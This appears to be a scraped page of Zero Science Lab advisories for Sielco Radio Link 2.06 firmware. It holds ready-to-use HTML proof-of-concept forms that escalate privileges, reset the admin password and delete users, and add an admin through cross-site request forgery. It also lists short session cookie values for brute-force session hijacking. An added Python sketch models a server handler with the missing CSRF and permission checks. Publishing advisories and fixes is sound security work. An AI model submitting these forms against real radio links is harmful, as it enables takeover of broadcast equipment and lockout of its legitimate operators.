value="" /><br /> <input type="hidden" name="pwd2" value="" /><br /> <input type="hidden" name="pwd2bis" value="" /><br /> <input type="hidden" name="auth2" value="0" /><br /> <input type="hidden" name="user3" value="" /><br /> <input type="hidden" name="pwd3" value="" /><br /> <input type="hidden" name="pwd3bis" value="" /><br /> <input type="hidden" name="auth3" value="0" /><br /> 
<input type="submit" value="Escalate" /><br /> </form><br /> </body><br /></html><br /></code></pre>
<pre><code><!--<br /><br /><br />Sielco Radio Link 2.06 Improper Access Control Change Admin Password<br /><br /><br />Vendor: Sielco S.r.l<br />Product web page: https://www.sielco.org<br />Affected version: 2.06 (RTX19)<br /> 2.05 (RTX19)<br /> 2.00 (EXC19)<br /> 1.60 (RTX19)<br /> 1.59 (RTX19)<br /> 1.55 (EXC19)<br /><br />Summary: Sielco develops and produces radio links for all transmission<br />and reception needs, thanks to innovative units and excellent performances,<br />accompanied by a high reliability and low consumption.<br /><br />Desc: The application suffers from improper access control when editing<br />users. A user with Read permissions can manipulate users, passwords and<br />permissions by sending a single HTTP POST request with modified parameters<br />and edit other users' names, passwords and permissions including admin<br />password.<br /><br />Tested on: lwIP/2.1.1<br /> Web/2.9.3<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5760<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5760.php<br /><br /><br />26.01.2023<br /><br />--><br /><br /><br /><html><br /> <body><br /> <form action="http://radiolink/protect/users_rx.htm" method="POST"><br /> <input type="hidden" name="pwd0" value="Ch4nged12" /> <!-- This will set/modify admin pwd --><br /> <input type="hidden" name="pwd0bis" value="Ch4nged12" /> <!-- This will set/modify admin pwd --><br /> <input type="hidden" name="user1" value="" /> <!-- This will set/modify user1 --><br /> <input type="hidden" name="pwd1" value="" /> <!-- This will set/modify user1 pwd --><br /> <input type="hidden" name="pwd1bis" value="" /> <!-- This will set/modify user1 pwd --><br /> <input type="hidden" name="auth1" value="0" /> <!-- This will set user1 read perm --><br /> <input type="hidden" name="user2" value="" /> <!-- This will set/modify user2 --><br /> <input type="hidden" name="pwd2" value="" /> 
<!-- This will set/modify user2 pwd --><br /> <input type="hidden" name="pwd2bis" value="" /> <!-- This will set/modify user2 pwd --><br /> <input type="hidden" name="auth2" value="0" /> <!-- This will set user2 read perm --><br /> <input type="hidden" name="user3" value="" /> <!-- This will set/modify user3 --><br /> <input type="hidden" name="pwd3" value="" /> <!-- This will set/modify user3 pwd --><br /> <input type="hidden" name="pwd3bis" value="" /> <!-- This will set/modify user3 pwd --><br /> <input type="hidden" name="auth3" value="0" /> <!-- This will set user3 read perm --><br /> <input type="submit" value="Modify admin pwd, delete all users" /><br /> </form><br /> </body><br /></html><br /></code></pre>
<pre><code><!--<br /><br /><br />Sielco Radio Link 2.06 Cross-Site Request Forgery (Add Admin)<br /><br /><br />Vendor: Sielco S.r.l<br />Product web page: https://www.sielco.org<br />Affected version: 2.06 (RTX19)<br /> 2.05 (RTX19)<br /> 2.00 (EXC19)<br /> 1.60 (RTX19)<br /> 1.59 (RTX19)<br /> 1.55 (EXC19)<br /><br />Summary: Sielco develops and produces radio links for all<br />transmission and reception needs, thanks to innovative units<br />and excellent performances, accompanied by a high reliability<br />and low consumption.<br /><br />Desc: The application interface allows users to perform certain<br />actions via HTTP requests without performing any validity checks<br />to verify the requests. This can be exploited to perform certain<br />actions with administrative privileges if a logged-in user visits<br />a malicious web site.<br /><br />Tested on: lwIP/2.1.1<br /> Web/2.9.3<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5761<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5761.php<br /><br /><br />26.01.2023<br /><br />--><br /><br /><br />CSRF Add Admin:<br />---------------<br /><br /><html><br /> <body><br /> <form action="http://radiolink/protect/users_rx.htm" method="POST"><br /> <input type="hidden" name="pwd0" value="" /><br /> <input type="hidden" name="pwd0bis" value="" /><br /> <input type="hidden" name="user1" value="Reader" /><br /> <input type="hidden" name="pwd1" value="123456" /><br /> <input type="hidden" name="pwd1bis" value="123456" /><br /> <input type="hidden" name="auth1" value="2" /><br /> <input type="hidden" name="user2" value="" /><br /> <input type="hidden" name="pwd2" value="" /><br /> <input type="hidden" name="pwd2bis" value="" /><br /> <input type="hidden" name="auth2" value="0" /><br /> <input type="hidden" name="user3" value="" /><br /> <input type="hidden" name="pwd3" value="" /><br /> <input type="hidden" 
name="pwd3bis" value="" /><br /> <input type="hidden" name="auth3" value="0" /><br /> <input type="submit" value="Adminize Me!" /><br /> </form><br /> </body><br /></html><br /></code></pre>
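<p>Added example, not Sielco firmware, serving the three Radio Link advisories above that all post to users_rx.htm (privilege escalation through auth1..3, admin password change through pwd0/pwd0bis, and CSRF): a model of the handler with the checks the device lacks, the caller's own permission level, a per-session CSRF token, and confirmation-field agreement. Permission levels 0/1/2 for Read/Write/Admin follow the advisory; the store layout, session object and token handling are assumed.</p>

```python
"""Server-side handling of the users_rx.htm form fields.
Assumed model: a fixed admin (pwd0) plus three configurable slots
(user1..3 / pwd1..3 / auth1..3), a session with its own CSRF token.
"""
import secrets
from typing import Dict, Optional, Tuple

READ, WRITE, ADMIN = 0, 1, 2   # the advisory's auth values


class UserStore:
    def __init__(self) -> None:
        self.admin_pw = "admin-initial"                 # constructed value
        self.users = {1: ("", "", READ), 2: ("", "", READ), 3: ("", "", READ)}


class Session:
    def __init__(self, name: str, level: int) -> None:
        self.name = name
        self.level = level
        self.csrf = secrets.token_urlsafe(24)  # issued once, embedded in the real form


def handle_users_rx(store: UserStore, session: Optional[Session],
                    form: Dict[str, str]) -> Tuple[int, str]:
    """Return (http_status, reason); the store changes only when every check passes."""
    if session is None:
        return 401, "no session"
    # 1. CSRF: a token bound to this session must be in the POST body, so a form
    #    auto-submitted from another site (the advisory's CSRF page) is refused.
    if not secrets.compare_digest(form.get("csrf", "").encode(), session.csrf.encode()):
        return 403, "missing or wrong csrf token"
    # 2. Authorization: only an Admin may edit accounts or permission levels,
    #    whatever values a Read user puts in auth1..3 or pwd0.
    if session.level < ADMIN:
        return 403, f"level {session.level} may not edit users"
    # 3. Validation: confirmation fields must agree, levels must be in range.
    if form.get("pwd0", "") != form.get("pwd0bis", ""):
        return 400, "pwd0 confirmation mismatch"
    for i in (1, 2, 3):
        if form.get(f"pwd{i}", "") != form.get(f"pwd{i}bis", ""):
            return 400, f"pwd{i} confirmation mismatch"
        if form.get(f"auth{i}", "0") not in ("0", "1", "2"):
            return 400, f"auth{i} out of range"
    # All checks passed: apply. (Passwords kept as given here for brevity; a
    # real implementation would store a hash.)
    if form.get("pwd0"):
        store.admin_pw = form["pwd0"]
    for i in (1, 2, 3):
        store.users[i] = (form.get(f"user{i}", ""), form.get(f"pwd{i}", ""),
                          int(form.get(f"auth{i}", "0")))
    return 200, "applied"
```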
<pre><code><br />Sielco Radio Link 2.06 'id' Cookie Brute Force Session Hijacking<br /><br /><br />Vendor: Sielco S.r.l<br />Product web page: https://www.sielco.org<br />Affected version: 2.06 (RTX19)<br /> 2.05 (RTX19)<br /> 2.00 (EXC19)<br /> 1.60 (RTX19)<br /> 1.59 (RTX19)<br /> 1.55 (EXC19)<br /><br />Summary: Sielco develops and produces radio links for all<br />transmission and reception needs, thanks to innovative units<br />and excellent performances, accompanied by a high reliability<br />and low consumption.<br /><br />Desc: The Cookie session ID 'id' is of an insufficient length and<br />can be exploited by brute force, which may allow a remote attacker<br />to obtain a valid session, bypass authentication and manipulate<br />the transmitter.<br /><br />Tested on: lwIP/2.1.1<br /> Web/2.9.3<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5762<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5762.php<br /><br /><br />26.01.2023<br /><br />--<br /><br /><br /># Session values (len=5)<br /><br />Cookie: id=42331<br />Cookie: id=28903<br />Cookie: id=+5581<br />Cookie: id=+9002<br />...<br />...<br /></code></pre>